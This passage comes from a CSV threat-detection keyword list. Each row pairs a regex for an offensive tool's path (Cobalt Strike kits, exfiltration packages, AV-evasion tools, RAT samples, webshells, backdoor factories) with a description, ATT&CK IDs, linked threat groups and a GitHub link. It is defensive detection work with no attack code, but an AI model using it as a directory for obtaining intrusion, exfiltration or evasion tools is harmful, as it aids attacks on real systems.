fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","5467" "*/audio/exfiltrator.py*",".{0,1000}\/audio\/exfiltrator\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","5468" "*/Augustus.git*",".{0,1000}\/Augustus\.git.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/TunnelGRE/Augustus","1","1","N/A","N/A","6","2","131","26","2024-07-27T14:47:45Z","2023-08-21T15:08:40Z","5469" "*/auth/cc2_auth.*",".{0,1000}\/auth\/cc2_auth\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","5470" "*/auth-owners.nse*",".{0,1000}\/auth\-owners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5471" "*/auth-spoof.nse*",".{0,1000}\/auth\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5472" "*/autobloody.git*",".{0,1000}\/autobloody\.git.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","5473" "*/autobloody/archive*",".{0,1000}\/autobloody\/archive.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","5474" 
"*/AutoBlue-MS17-010.git*",".{0,1000}\/AutoBlue\-MS17\-010\.git.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","5475" "*/AutoBypass.ps1*",".{0,1000}\/AutoBypass\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","5476" "*/AutoCrypt.ahk*",".{0,1000}\/AutoCrypt\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","5477" "*/autoNTDS.git*",".{0,1000}\/autoNTDS\.git.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","1","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","5486" 
"*/autoNTDS.py*",".{0,1000}\/autoNTDS\.py.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","1","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","5487" "*/AutoPwnKey.git*",".{0,1000}\/AutoPwnKey\.git.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","5488" "*/autordpwn.php*",".{0,1000}\/autordpwn\.php.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","5489" "*/AutoRDPwn/master/*",".{0,1000}\/AutoRDPwn\/master\/.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","5490" "*/AutoRecon.git*",".{0,1000}\/AutoRecon\.git.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","5491" "*/AutoSmuggle.git*",".{0,1000}\/AutoSmuggle\.git.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","5492" "*/AutoSUID.git*",".{0,1000}\/AutoSUID\.git.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","1","N/A","N/A","7","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","5493" "*/auxiliary/scanner/*",".{0,1000}\/auxiliary\/scanner\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5494" "*/AV_Evasion_Tool.git*",".{0,1000}\/AV_Evasion_Tool\.git.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","1","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","5495" "*/avet.git*",".{0,1000}\/avet\.git.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","5496" "*/avet_fabric.py*",".{0,1000}\/avet_fabric\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","5497" "*/avet_script_config.sh*",".{0,1000}\/avet_script_config\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","5498" "*/AVKiller.git*",".{0,1000}\/AVKiller\.git.{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","1","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","5499" "*/avoid_badchars.py*",".{0,1000}\/avoid_badchars\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","1","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","5500" "*/avred.git*",".{0,1000}\/avred\.git.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","5501" "*/avred.py*",".{0,1000}\/avred\.py.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","5502" "*/avred.py*",".{0,1000}\/avred\.py.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a 
collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","5503" "*/avredweb.py *",".{0,1000}\/avredweb\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","5504" "*/awesome-burp-extensions/*",".{0,1000}\/awesome\-burp\-extensions\/.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","5507" "*/awesome-pentest*",".{0,1000}\/awesome\-pentest.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid 
Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","5508" "*/aws__enum_account*",".{0,1000}\/aws__enum_account.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5509" 
"*/aws__enum_account/main.py*",".{0,1000}\/aws__enum_account\/main\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5510" "*/AWS-Loot*",".{0,1000}\/AWS\-Loot.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","5511" "*/Azure-AccessPermissions.git*",".{0,1000}\/Azure\-AccessPermissions\.git.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","5512" "*/AzureC2Relay*",".{0,1000}\/AzureC2Relay.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","5513" "*/AzureHound.ps1*",".{0,1000}\/AzureHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use 
Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","5514" "*/AzureHound.ps1*",".{0,1000}\/AzureHound\.ps1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","5515" "*/B0-K RAT Majdi SaaD.exe*",".{0,1000}\/B0\-K\sRAT\sMajdi\sSaaD\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5516" "*/B374K*",".{0,1000}\/B374K.{0,1000}","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. 
All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/b374k/b374k","1","0","N/A","N/A","N/A","10","2462","747","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z","5517" "*/BabelStrike.git*",".{0,1000}\/BabelStrike\.git.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","5518" "*/BabelStrike.py*",".{0,1000}\/BabelStrike\.py.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. 
from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","5519" "*/Babylon RAT.exe*",".{0,1000}\/Babylon\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5520" "*/Babylon RAT.exe*",".{0,1000}\/Babylon\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5521" "*/Babylon RAT.exe*",".{0,1000}\/Babylon\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5522" "*/BabyShark.git*",".{0,1000}\/BabyShark\.git.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - 
TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","5523" "*/BackDoor*",".{0,1000}\/BackDoor.{0,1000}","offensive_tool_keyword","_","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5524" "*/backdoor.bat*",".{0,1000}\/backdoor\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","5525" "*/backdoor.exe*",".{0,1000}\/backdoor\.exe.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","5526" "*/Backdoor.PHP.Agent.php*",".{0,1000}\/Backdoor\.PHP\.Agent\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5527" "*/backdoor.py*",".{0,1000}\/backdoor\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","5528" 
